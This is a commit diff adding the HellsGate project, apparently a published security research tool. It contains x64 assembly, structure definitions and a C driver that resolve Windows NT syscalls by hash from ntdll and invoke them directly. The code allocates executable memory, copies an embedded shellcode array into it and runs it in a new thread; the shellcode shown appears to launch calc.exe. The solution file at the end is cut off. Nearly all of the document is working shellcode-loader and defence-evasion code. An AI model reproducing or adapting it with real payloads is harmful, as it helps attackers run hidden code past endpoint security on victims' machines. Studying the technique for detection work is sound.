Add files via upload
This commit is contained in:
parent
ad3ed5a13f
commit
a6dbe47b59
|
@ -0,0 +1,262 @@
|
|||
; @file HELLSGATE.ASM
|
||||
; @data 07-08-2020
|
||||
; @author Paul Laîné (@am0nsec)
|
||||
; @version 1.0
|
||||
; @brief Dynamically extracting and invoking syscalls from in-memory modules.
|
||||
; @details
|
||||
; @link https://ntamonsec.blogspot.com/
|
||||
; @copyright This project has been released under the GNU Public License v3 license.
|
||||
|
||||
include HELLSGATE.INC
|
||||
|
||||
_DATA segment
|
||||
extern Shellcode: BYTE
|
||||
extern ShellcodeLength: QWORD
|
||||
|
||||
wSystemCall DWORD 000h
|
||||
lpAddress QWORD ?
|
||||
sDataSize QWORD ?
|
||||
OldProtect QWORD ?
|
||||
hThreadHandle QWORD ?
|
||||
|
||||
VXTable VX_TABLE <>
|
||||
Timeout LARGE_INTEGER <>
|
||||
_DATA ends
|
||||
|
||||
_TEXT segment
|
||||
SystemCall PROC
|
||||
mov r10, rcx
|
||||
syscall
|
||||
ret
|
||||
SystemCall ENDP
|
||||
|
||||
HellsGate PROC
|
||||
_start:
|
||||
mov r8, gs:[60h] ; Get process environment block (PEB)
|
||||
cmp [r8].PEB.OSMajorVersion, 0Ah ;
|
||||
jne _failure ; Jump if not Windows 10
|
||||
|
||||
; Get the base address of ntdll
|
||||
mov r8, [r8].PEB.Ldr ;
|
||||
mov r8, [r8].PEB_LDR_DATA.InMemoryOrderModuleList.Flink - 10h ; First loaded module: e.g. hellsgate.exe
|
||||
mov r8, [r8].LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.Flink - 10h ; Second loaded module: e.g. ntdll.dll
|
||||
mov r8, [r8].LDR_DATA_TABLE_ENTRY.DllBase ; Image base of the module
|
||||
mov r9, r8 ; Store for later use
|
||||
|
||||
; Get module export directory
|
||||
cmp [r8].IMAGE_DOS_HEADER.e_magic, 5A4Dh ; DOS Header --> MZ
|
||||
jne _failure ;
|
||||
|
||||
mov ebx, [r8].IMAGE_DOS_HEADER.e_lfanew ; RVA of IMAGE_NT_HEADERS64
|
||||
add r8, rbx ;
|
||||
cmp [r8].IMAGE_NT_HEADERS64.Signature, 00004550h ; NT Header --> PE00
|
||||
jne _failure ;
|
||||
|
||||
mov ebx, IMAGE_NT_HEADERS64.OptionalHeader ; RVA of IMAGE_OPTIONAL_HEADER64
|
||||
add r8, rbx ;
|
||||
cmp [r8].IMAGE_OPTIONAL_HEADER64.Magic, 20bh ; Optional header --> 0x20b
|
||||
jne _failure ;
|
||||
|
||||
lea r8, [r8].IMAGE_OPTIONAL_HEADER64.DataDirectory ; First entry of the DataDirectory array
|
||||
mov ebx, [r8].IMAGE_DATA_DIRECTORY.VirtualAddress ; RVA of IMAGE_EXPORT_DIRECTORY
|
||||
mov r8, r9 ; ImageBase
|
||||
add r8, rbx ; Module + RVA
|
||||
|
||||
; Push function hashes
|
||||
mov VXTable.NtAllocateVirtualMemory.dwHash, 002B73D648h ; DJB2 hash of NtAllocateVirtualMemory
|
||||
mov VXTable.NtProtectVirtualMemory.dwHash, 00FE950644h ; DJB2 hash of NtProtectVirtualMemory
|
||||
mov VXTable.NtCreateThreadEx.dwHash, 00B151D7ACh ; DJB2 hash of NtCreateThreadEx
|
||||
mov VXTable.NtWaitForSingleObject.dwHash, 0091F4EA38h ; DJB2 hash of NtWaitForSingleObject
|
||||
|
||||
xor r15, r15 ; Clean R15 register
|
||||
mov r15b, 4h ; Move to R15 number of functions to find
|
||||
|
||||
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfNames ; Address of the function name
|
||||
mov r12, r9 ; Function name RVA
|
||||
add r12, rbx ; ImageBase + RVA
|
||||
|
||||
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfFunctions ; Address of function pointers
|
||||
mov r13, r9 ;
|
||||
add r13, rbx ;
|
||||
|
||||
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals ; Address of function ordinals
|
||||
mov r14, r9 ;
|
||||
add r14, rbx ;
|
||||
|
||||
mov ecx, [r8].IMAGE_EXPORT_DIRECTORY.NumberOfNames ; Total number of named functions
|
||||
dec ecx
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; Find function ordinal index w/ function name hash
|
||||
;-----------------------------------------------------------------------------
|
||||
_parse_functions_name:
|
||||
mov rbx, 4h ; sizeof(DWORD)
|
||||
imul rbx, rcx ; siezof(DWORD) * RCX
|
||||
mov esi, [r12 + rbx] ; Function RVA
|
||||
add rsi, r9 ; Function RVA + ImageBase
|
||||
|
||||
mov r10d, 5381h ; hash = 0x5381
|
||||
_djb2:
|
||||
mov r11d, r10d ; Store original hash value for later
|
||||
shl r10d, 5 ; hash << 5
|
||||
add r10d, r11d ; (hash << 5) + hash
|
||||
|
||||
xor r11d, r11d ; Clean temporary hash value
|
||||
mov r11b, byte ptr [rsi] ; Get ASCII char
|
||||
add r10d, r11d ; ((hash << 5) + hash) + char
|
||||
|
||||
inc rsi ; Next string char
|
||||
cmp byte ptr [rsi], 00h ; End of string
|
||||
jne _djb2 ;
|
||||
|
||||
lea rax, VXTable ; Address of VX table
|
||||
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
|
||||
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
|
||||
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
|
||||
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
|
||||
xor r10d, [rax].VX_TABLE_ENTRY.dwHash ; Check if function has been found
|
||||
jz _get_function_address ;
|
||||
loop _parse_functions_name ;
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; Find the function address w/ function ordinal
|
||||
;-----------------------------------------------------------------------------
|
||||
_get_function_address:
|
||||
mov rax, 2h ; sizeof(WORD)
|
||||
imul rax, rcx ; sizeof(WORD) * RCX
|
||||
mov ax, [r14 + rax] ; AX = function ordinal
|
||||
|
||||
imul rax, 4 ; sizeof(DWORD) * ordinal
|
||||
mov eax, [r13 + rax] ; RVA of function
|
||||
mov rbx, r9 ; RBX = ImageBase
|
||||
add rbx, rax ; RBX = address of function
|
||||
|
||||
lea rax, VXTable ; Address of VX table
|
||||
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
|
||||
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
|
||||
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
|
||||
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
|
||||
mov [rax].VX_TABLE_ENTRY.pAddress, rbx ;
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; Find the function system call w/ function address
|
||||
;-----------------------------------------------------------------------------
|
||||
_get_function_syscall:
|
||||
inc rbx
|
||||
cmp byte ptr [rbx], 00C3h ; Check if RET
|
||||
je _failure ;
|
||||
|
||||
cmp word ptr [rbx], 050Fh ; Check if syscall
|
||||
jne _get_function_syscall ;
|
||||
|
||||
sub rbx, 0Eh ; Address of system call
|
||||
mov cx, word ptr [rbx] ; CX = system call
|
||||
|
||||
lea rax, VXTable ; Address of VX table
|
||||
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
|
||||
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
|
||||
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
|
||||
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
|
||||
mov [rax].VX_TABLE_ENTRY.wSystemCall, cx ;
|
||||
|
||||
_reset_loop:
|
||||
; Move to the next function
|
||||
mov ecx, [r8].IMAGE_EXPORT_DIRECTORY.NumberOfNames ; Reset counter
|
||||
dec ecx ;
|
||||
dec r15 ; Check if all function have been found
|
||||
jnz _parse_functions_name ;
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; Execute the payload
|
||||
;-----------------------------------------------------------------------------
|
||||
_payload:
|
||||
; Initialise variables
|
||||
mov r10, ShellcodeLength ;
|
||||
mov sDataSize, r10 ; Store shellcode length
|
||||
mov lpAddress, 0h ;
|
||||
|
||||
; Execute NtAllocateVirtualMemory
|
||||
mov ax, VXTable.NtAllocateVirtualMemory.wSystemCall ;
|
||||
mov rcx, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
|
||||
lea rdx, lpAddress ; BaseAddress
|
||||
xor r8, r8 ; ZeroBits
|
||||
lea r9, sDataSize ; RegionSize
|
||||
mov qword ptr [rsp + 20h], 3000h ; AllocationType
|
||||
mov qword ptr [rsp + 28h], 4 ; Protect
|
||||
|
||||
call SystemCall ;
|
||||
cmp eax, 00h ; (NTSTATUS != 0)
|
||||
jne _failure ;
|
||||
|
||||
; Copy shellcode
|
||||
cld ; Clear direction flag == forward copy
|
||||
lea rsi, Shellcode ; Origin
|
||||
mov rdi, lpAddress ; Destination
|
||||
mov rcx, ShellcodeLength ; Size of shellcode
|
||||
rep movsb ; Copy byte until RCX = 0
|
||||
|
||||
; Execute NtProtectVirtualMemory
|
||||
mov ax, VXTable.NtProtectVirtualMemory.wSystemCall ;
|
||||
mov rcx, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
|
||||
lea rdx, lpAddress ; BaseAddress
|
||||
lea r8, sDataSize ; NumberOfBytesToProtect
|
||||
mov r9d, 20h ; NewAccessProtection
|
||||
|
||||
mov OldProtect, 00h ;
|
||||
lea r11, OldProtect ;
|
||||
mov qword ptr [rsp + 20h], r11 ; OldAccessProtection
|
||||
|
||||
call SystemCall ;
|
||||
cmp eax, 00h ; (NTSTATUS != 0)
|
||||
jne _failure ;
|
||||
|
||||
; Execute NtCreateThreadEx
|
||||
mov ax, VXTable.NtCreateThreadEx.wSystemCall
|
||||
mov hThreadHandle, 0 ;
|
||||
lea rcx, hThreadHandle ; hThread
|
||||
mov rdx, 1FFFFFh ; DesiredAccess
|
||||
xor r8, r8 ; ObjectAttributes
|
||||
mov r9, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
|
||||
mov r10, lpAddress ;
|
||||
mov qword ptr [rsp + 20h], r10 ; lpStartAddress
|
||||
mov qword ptr [rsp + 28h], 00h ; lpParameter
|
||||
mov qword ptr [rsp + 30h], 00h ; Flags
|
||||
mov qword ptr [rsp + 38h], 00h ; StackZeroBits
|
||||
mov qword ptr [rsp + 40h], 00h ; SizeOfStackCommit
|
||||
mov qword ptr [rsp + 48h], 00h ; SizeOfStackReserve
|
||||
mov qword ptr [rsp + 50h], 00h ; lpBytesBuffer
|
||||
|
||||
call SystemCall ;
|
||||
cmp eax, 00h ; (NTSTATUS != 0)
|
||||
jne _failure ;
|
||||
|
||||
; Execute NtWaitForSingleObject
|
||||
mov ax, VXTable.NtWaitForSingleObject.wSystemCall ;
|
||||
mov rcx, hThreadHandle ; ObjectHandle
|
||||
xor rdx, rdx ; Alertable
|
||||
|
||||
mov Timeout, 0FFFFFFFFFF676980h ; TimeOut
|
||||
lea r8, Timeout ;
|
||||
|
||||
call SystemCall ;
|
||||
cmp eax, 00h ; (NTSTATUS != 0)
|
||||
jne _failure ;
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; Successfully execution of the function
|
||||
;-----------------------------------------------------------------------------
|
||||
_success:
|
||||
mov rax, 1
|
||||
ret
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; In case something goes wrong
|
||||
;-----------------------------------------------------------------------------
|
||||
_failure:
|
||||
xor rax, rax
|
||||
ret
|
||||
HellsGate ENDP
|
||||
_TEXT ends
|
||||
|
||||
; end of file
|
||||
end
|
|
@ -0,0 +1,285 @@
|
|||
; @file HELLSGATE.INC
|
||||
; @data 07-08-2020
|
||||
; @author Paul Laîné (@am0nsec)
|
||||
; @version 1.0
|
||||
; @brief Dynamically extracting and invoking syscalls from in-memory modules.
|
||||
; @details
|
||||
; @link https://ntamonsec.blogspot.com/
|
||||
; @copyright This project has been released under the GNU Public License v3 license.
|
||||
|
||||
VXTableEntrySize EQU SIZEOF VX_TABLE_ENTRY
|
||||
VXTableSize EQU SIZEOF VX_TABLE
|
||||
|
||||
VX_TABLE_ENTRY struct
|
||||
pAddress QWORD ? ; 0x0000
|
||||
dwHash DWORD ? ; 0x0008
|
||||
wSystemCall WORD ? ; 0x000C
|
||||
BYTE 2 dup(?) ; padding
|
||||
VX_TABLE_ENTRY ends
|
||||
|
||||
VX_TABLE struct
|
||||
NtAllocateVirtualMemory VX_TABLE_ENTRY <> ; 0x0000
|
||||
NtProtectVirtualMemory VX_TABLE_ENTRY <> ; 0x0010
|
||||
NtCreateThreadEx VX_TABLE_ENTRY <> ; 0x0020
|
||||
NtWaitForSingleObject VX_TABLE_ENTRY <> ; 0x0030
|
||||
VX_TABLE ends
|
||||
|
||||
LARGE_INTEGER struct
|
||||
LowPart DWORD ? ; 0x0000
|
||||
HighPart DWORD ? ; 0x0004
|
||||
LARGE_INTEGER ends
|
||||
|
||||
ULARGE_INTEGER struct
|
||||
LowPart DWORD ? ; 0x0000
|
||||
HighPart DWORD ? ; 0x0004
|
||||
ULARGE_INTEGER ends
|
||||
|
||||
UNICODE_STRING struct
|
||||
_Length WORD ? ; 0x0000
|
||||
MaximumLength WORD ? ; 0x0002
|
||||
BYTE 4 dup(?) ; padding
|
||||
Buffer QWORD ? ; 0x0008
|
||||
UNICODE_STRING ends
|
||||
|
||||
LIST_ENTRY struct
|
||||
Flink QWORD ? ; 0x0000
|
||||
BLink QWORD ? ; 0x0008
|
||||
LIST_ENTRY ends
|
||||
|
||||
PEB struct
|
||||
InheritedAddressSpace BYTE ? ; 0x0000
|
||||
ReadImageFileExecOptions BYTE ? ; 0x0001
|
||||
BeingDebugged BYTE ? ; 0x0002
|
||||
BitField BYTE ? ; 0x0003
|
||||
Padding0 BYTE 4 dup(?) ; 0x0004
|
||||
Mutant QWORD ? ; 0x0008
|
||||
ImageBaseAddress QWORD ? ; 0x0010
|
||||
Ldr QWORD ? ; 0x0018
|
||||
ProcessParameters QWORD ? ; 0x0020
|
||||
SubSystemData QWORD ? ; 0x0028
|
||||
ProcessHeap QWORD ? ; 0x0030
|
||||
FastPebLock QWORD ? ; 0x0038
|
||||
AtlThunkSListPtr QWORD ? ; 0x0040
|
||||
IFEOKey QWORD ? ; 0x0048
|
||||
CrossProcessFlags DWORD ? ; 0x0050
|
||||
Padding1 BYTE 4 dup(?) ; 0x0054
|
||||
UserSharedInfoPtr QWORD ? ; 0x0058
|
||||
SystemReserved DWORD ? ; 0x0060
|
||||
AtlThunkSListPtr32 DWORD ? ; 0x0064
|
||||
ApiSetMap QWORD ? ; 0x0068
|
||||
TlsExpansionCounter DWORD ? ; 0x0070
|
||||
Padding2 BYTE 4 dup(?) ; 0x0074
|
||||
TlsBitmap QWORD ? ; 0x0078
|
||||
TlsBitmapBits DWORD 2 dup(?) ; 0x0080
|
||||
ReadOnlySharedMemoryBase QWORD ? ; 0x0088
|
||||
SharedData QWORD ? ; 0x0090
|
||||
ReadOnlyStaticServerData QWORD ? ; 0x0098
|
||||
AnsiCodePageData QWORD ? ; 0x00A0
|
||||
OemCodePageData QWORD ? ; 0x00A8
|
||||
UnicodeCaseTableData QWORD ? ; 0x00B0
|
||||
NumberOfProcessors DWORD ? ; 0x00B9
|
||||
NtGlobalFlag DWORD ? ; 0x00BC
|
||||
CriticalSectionTimeout LARGE_INTEGER <> ; 0x00C0
|
||||
HeapSegmentReserve QWORD ? ; 0x00C8
|
||||
HeapSegmentCommit QWORD ? ; 0x00D0
|
||||
HeapDeCommitTotalFreeThreshold QWORD ? ; 0x00D8
|
||||
HeapDeCommitFreeBlockThreshold QWORD ? ; 0x00E0
|
||||
NumberOfHeaps DWORD ? ; 0x00E8
|
||||
MaximumNumberOfHeaps DWORD ? ; 0x00EC
|
||||
ProcessHeaps QWORD ? ; 0x00F0
|
||||
GdiSharedHandleTable QWORD ? ; 0x00F8
|
||||
ProcessStarterHelper QWORD ? ; 0x0100
|
||||
GdiDCAttributeList DWORD ? ; 0x0108
|
||||
Padding3 BYTE 4 dup(?) ; 0x010C
|
||||
LoaderLock QWORD ? ; 0x0110
|
||||
OSMajorVersion DWORD ? ; 0x0118
|
||||
OSMinorVersion DWORD ? ; 0x011C
|
||||
OSBuildNumber WORD ? ; 0x0120
|
||||
OSCSDVersion WORD ? ; 0x0122
|
||||
OSPlatformId DWORD ? ; 0x0124
|
||||
ImageSubsystem DWORD ? ; 0x0128
|
||||
ImageSubsystemMajorVersion DWORD ? ; 0x012C
|
||||
ImageSubsystemMinorVersion DWORD ? ; 0x0130
|
||||
Padding4 BYTE 4 dup(?) ; 0x0134
|
||||
ActiveProcessAffinityMask QWORD ? ; 0x0138
|
||||
GdiHandleBuffer DWORD 60 dup(?) ; 0x0140
|
||||
PostProcessInitRoutine QWORD ? ; 0x0230
|
||||
TlsExpansionBitmap QWORD ? ; 0x0238
|
||||
TlsExpansionBitmapBits DWORD 32 dup(?) ; 0x0240
|
||||
SessionId DWORD ? ; 0x02C0
|
||||
Padding5 BYTE 4 dup(?) ; 0x02C4
|
||||
AppCompatFlags ULARGE_INTEGER <> ; 0x02C8
|
||||
AppCompatFlagsUser ULARGE_INTEGER <> ; 0x02D0
|
||||
pShimData QWORD ? ; 0x02D8
|
||||
AppCompatInfo QWORD ? ; 0x02E0
|
||||
CSDVersion UNICODE_STRING <> ; 0x02E8
|
||||
ActivationContextData QWORD ? ; 0x02F8
|
||||
ProcessAssemblyStorageMap QWORD ? ; 0x0300
|
||||
SystemDefaultActivationContextData QWORD ? ; 0x0308
|
||||
SystemAssemblyStorageMap QWORD ? ; 0x0310
|
||||
MinimumStackCommit QWORD ? ; 0x0318
|
||||
SparePointers QWORD 4 dup(?) ; 0x0320
|
||||
SpareUlongs DWORD 5 dup(?) ; 0x0340
|
||||
BYTE 4 dup(?)
|
||||
WerRegistrationData QWORD ? ; 0x0358
|
||||
WerShipAssertPtr QWORD ? ; 0x0360
|
||||
pUnused QWORD ? ; 0x0368
|
||||
pImageHeaderHash QWORD ? ; 0x0370
|
||||
TracingFlags DWORD ? ; 0x0378
|
||||
Padding6 BYTE 4 dup(?) ; 0x037c
|
||||
CsrServerReadOnlySharedMemoryBase QWORD ? ; 0x0380
|
||||
TppWorkerpListLock QWORD ? ; 0x0388
|
||||
TppWorkerpList LIST_ENTRY <> ; 0x0390
|
||||
WaitOnAddressHashTable QWORD 128 dup(?) ; 0x03A0
|
||||
TelemetryCoverageHeader QWORD ? ; 0x07A0
|
||||
CloudFileFlags DWORD ? ; 0x07A8
|
||||
CloudFileDiagFlags DWORD ? ; 0x07AC
|
||||
PlaceholderCompatibilityMode BYTE ? ; 0x07B0
|
||||
PlaceholderCompatibilityModeReserved BYTE 7 dup(?) ; 0x07B1
|
||||
LeapSecondData QWORD ? ; 0x07B8
|
||||
LeapSecondFlags DWORD ? ; 0x07c0
|
||||
NtGlobalFlag2 DWORD ? ; 0x07c4
|
||||
PEB ends
|
||||
|
||||
PEB_LDR_DATA struct
|
||||
_Length DWORD ? ; 0x0000
|
||||
Initialized BYTE ? ; 0x0004
|
||||
BYTE 3 dup(?) ; padding
|
||||
SsHandle QWORD ? ; 0x0008
|
||||
InLoadOrderModuleList LIST_ENTRY <> ; 0x0010
|
||||
InMemoryOrderModuleList LIST_ENTRY <> ; 0x0020
|
||||
InInitializationOrderModuleList LIST_ENTRY <> ; 0x0030
|
||||
EntryInProgress QWORD ? ; 0x0040
|
||||
ShutdownInProgress BYTE ? ; 0x0048
|
||||
BYTE 7 dup(?) ; padding
|
||||
ShutdownThreadId QWORD ? ; 0x0050
|
||||
PEB_LDR_DATA ends
|
||||
|
||||
RTL_BALANCED_NODE struct
|
||||
_Dummy BYTE 24 dup(?)
|
||||
RTL_BALANCED_NODE ends
|
||||
|
||||
LDR_DATA_TABLE_ENTRY struct
|
||||
InLoadOrderLinks LIST_ENTRY <> ; 0x0000
|
||||
InMemoryOrderLinks LIST_ENTRY <> ; 0x0010
|
||||
InInitializationOrderLinks LIST_ENTRY <> ; 0x0020
|
||||
DllBase QWORD ? ; 0x0030
|
||||
EntryPoint QWORD ? ; 0x0038
|
||||
SizeOfImage DWORD ? ; 0x0040
|
||||
BYTE 4 dup(?) ; padding
|
||||
FullDllName UNICODE_STRING <> ; 0x0048
|
||||
BaseDllName UNICODE_STRING <> ; 0x0058
|
||||
FlagGroup BYTE 4 dup(?) ; 0x0068
|
||||
ObsoleteLoadCount WORD ? ; 0x006C
|
||||
TlsIndex WORD ? ; 0x006E
|
||||
HashLinks LIST_ENTRY <> ; 0x0070
|
||||
TimeDateStamp DWORD ? ; 0x0080
|
||||
BYTE 4 dup(?) ; padding
|
||||
EntryPointActivationContext QWORD ? ; 0x0088
|
||||
_Lock QWORD ? ; 0x0090
|
||||
DdagNode QWORD ? ; 0x0098
|
||||
NodeModuleLink LIST_ENTRY <> ; 0x00A0
|
||||
LoadContext QWORD ? ; 0x00B0
|
||||
ParentDllBase QWORD ? ; 0x00B8
|
||||
SwitchBackContext QWORD ? ; 0x00C0
|
||||
BaseAddressIndexNode RTL_BALANCED_NODE <> ; 0x00C8
|
||||
MappingInfoIndexNode RTL_BALANCED_NODE <> ; 0x00E0
|
||||
OriginalBase QWORD ? ; 0x00F8
|
||||
LoadTime LARGE_INTEGER <> ; 0x0100
|
||||
BaseNameHashValue DWORD ? ; 0x0108
|
||||
LoadReason DWORD ? ; 0x010C
|
||||
ImplicitPathOptions DWORD ? ; 0x0110
|
||||
ReferenceCount DWORD ? ; 0x0114
|
||||
DependentLoadFlags DWORD ? ; 0x0118
|
||||
SigningLevel BYTE ? ; 0x011C
|
||||
LDR_DATA_TABLE_ENTRY ends
|
||||
|
||||
IMAGE_DOS_HEADER struct
|
||||
e_magic WORD ? ; 0x0000
|
||||
e_cblp WORD ? ; 0x0002
|
||||
e_cp WORD ? ; 0x0004
|
||||
e_crlc WORD ? ; 0x0006
|
||||
e_cparhdr WORD ? ; 0x0008
|
||||
e_minalloc WORD ? ; 0x000A
|
||||
e_maxalloc WORD ? ; 0x000C
|
||||
e_ss WORD ? ; 0x000E
|
||||
e_sp WORD ? ; 0x0010
|
||||
e_csum WORD ? ; 0x0012
|
||||
e_ip WORD ? ; 0x0014
|
||||
e_cs WORD ? ; 0x0016
|
||||
e_lfarlc WORD ? ; 0x0018
|
||||
e_ovno WORD ? ; 0x001A
|
||||
e_res WORD 4 dup(?) ; 0x001C
|
||||
e_oemid WORD ? ; 0x0024
|
||||
e_oeminfo WORD ? ; 0x0026
|
||||
e_res2 WORD 10 dup(?) ; 0x0028
|
||||
e_lfanew DWORD ? ; 0x003C
|
||||
IMAGE_DOS_HEADER ends
|
||||
|
||||
IMAGE_FILE_HEADER struct
|
||||
Machine WORD ? ; 0x0000
|
||||
NumberOfSections WORD ? ; 0x0002
|
||||
TimeDateStamp DWORD ? ; 0x0004
|
||||
PointerToSymbolTable DWORD ? ; 0x0008
|
||||
NumberOfSymbols DWORD ? ; 0x000c
|
||||
SizeOfOptionalHeader WORD ? ; 0x0010
|
||||
Characteristics WORD ? ; 0x0012
|
||||
IMAGE_FILE_HEADER ends
|
||||
|
||||
IMAGE_DATA_DIRECTORY struct
|
||||
VirtualAddress DWORD ? ; 0x0000
|
||||
_Size DWORD ? ; 0x0004
|
||||
IMAGE_DATA_DIRECTORY ends
|
||||
|
||||
IMAGE_OPTIONAL_HEADER64 struct
|
||||
Magic WORD ? ; 0x0000
|
||||
MajorLinkerVersion BYTE ? ; 0x0002
|
||||
MinorLinkerVersion BYTE ? ; 0x0003
|
||||
SizeOfCode DWORD ? ; 0x0004
|
||||
SizeOfInitializedData DWORD ? ; 0x0008
|
||||
SizeOfUninitializedData DWORD ? ; 0x000C
|
||||
AddressOfEntryPoint DWORD ? ; 0x0010
|
||||
BaseOfCode DWORD ? ; 0x0014
|
||||
ImageBase QWORD ? ; 0x0018
|
||||
SectionAlignment DWORD ? ; 0x0020
|
||||
FileAlignment DWORD ? ; 0x0024
|
||||
MajorOperatingSystemVersion WORD ? ; 0x0028
|
||||
MinorOperatingSystemVersion WORD ? ; 0x002a
|
||||
MajorImageVersion WORD ? ; 0x002C
|
||||
MinorImageVersion WORD ? ; 0x002E
|
||||
MajorSubsystemVersion WORD ? ; 0x0030
|
||||
MinorSubsystemVersion WORD ? ; 0x0032
|
||||
Win32VersionValue DWORD ? ; 0x0034
|
||||
SizeOfImage DWORD ? ; 0x0038
|
||||
SizeOfHeaders DWORD ? ; 0x003c
|
||||
CheckSum DWORD ? ; 0x0040
|
||||
Subsystem WORD ? ; 0x0044
|
||||
DllCharacteristics WORD ? ; 0x0046
|
||||
SizeOfStackReserve QWORD ? ; 0x0048
|
||||
SizeOfStackCommit QWORD ? ; 0x0050
|
||||
SizeOfHeapReserve QWORD ? ; 0x0058
|
||||
SizeOfHeapCommit QWORD ? ; 0x0060
|
||||
LoaderFlags DWORD ? ; 0x0068
|
||||
NumberOfRvaAndSizes DWORD ? ; 0x006C
|
||||
DataDirectory IMAGE_DATA_DIRECTORY 16 dup(<>) ; 0x0070
|
||||
IMAGE_OPTIONAL_HEADER64 ends
|
||||
|
||||
IMAGE_NT_HEADERS64 struct
|
||||
Signature DWORD ? ; 0x0000
|
||||
FileHeader IMAGE_FILE_HEADER <> ; 0x0004
|
||||
OptionalHeader IMAGE_OPTIONAL_HEADER64 <> ; 0x0018
|
||||
IMAGE_NT_HEADERS64 ends
|
||||
|
||||
IMAGE_EXPORT_DIRECTORY struct
|
||||
Characteristics DWORD ? ; 0x0000
|
||||
TimeDateStamp DWORD ? ; 0x0004
|
||||
MajorVersion WORD ? ; 0x0008
|
||||
MinorVersion WORD ? ; 0x000A
|
||||
_Name DWORD ? ; 0x000C
|
||||
Base DWORD ? ; 0x0010
|
||||
NumberOfFunctions DWORD ? ; 0x0014
|
||||
NumberOfNames DWORD ? ; 0x0018
|
||||
AddressOfFunctions DWORD ? ; 0x001C
|
||||
AddressOfNames DWORD ? ; 0x0020
|
||||
AddressOfNameOrdinals DWORD ? ; 0x0024
|
||||
IMAGE_EXPORT_DIRECTORY ends
|
|
@ -0,0 +1,42 @@
|
|||
/**
|
||||
* @file main.c
|
||||
* @data 07-08-2020
|
||||
* @author Paul Laîné(@am0nsec)
|
||||
* @version 1.0
|
||||
* @brief Dynamically extractingand invoking syscalls from in - memory modules.
|
||||
* @details
|
||||
* @link https ://ntamonsec.blogspot.com/
|
||||
* @copyright This project has been released under the GNU Public License v3 license.
|
||||
*/
|
||||
#include <Windows.h>
|
||||
|
||||
unsigned char Shellcode[] =
|
||||
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
|
||||
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
|
||||
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
|
||||
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
|
||||
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
|
||||
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
|
||||
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
|
||||
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
|
||||
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
|
||||
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
|
||||
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
|
||||
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
|
||||
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
|
||||
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
|
||||
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
|
||||
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
|
||||
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
|
||||
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
|
||||
"\x63\x2e\x65\x78\x65\x00";
|
||||
|
||||
DWORD ShellcodeLength = sizeof(Shellcode);
|
||||
|
||||
extern BOOL HellsGate(void);
|
||||
|
||||
INT wmain() {
|
||||
|
||||
BOOL a = HellsGate();
|
||||
|
||||
}
|
|
@ -0,0 +1,31 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio Version 16
|
||||
VisualStudioVersion = 16.0.30114.105
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HellsGate", "HellsGate\HellsGate.vcxproj", "{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|x64 = Debug|x64
|
||||
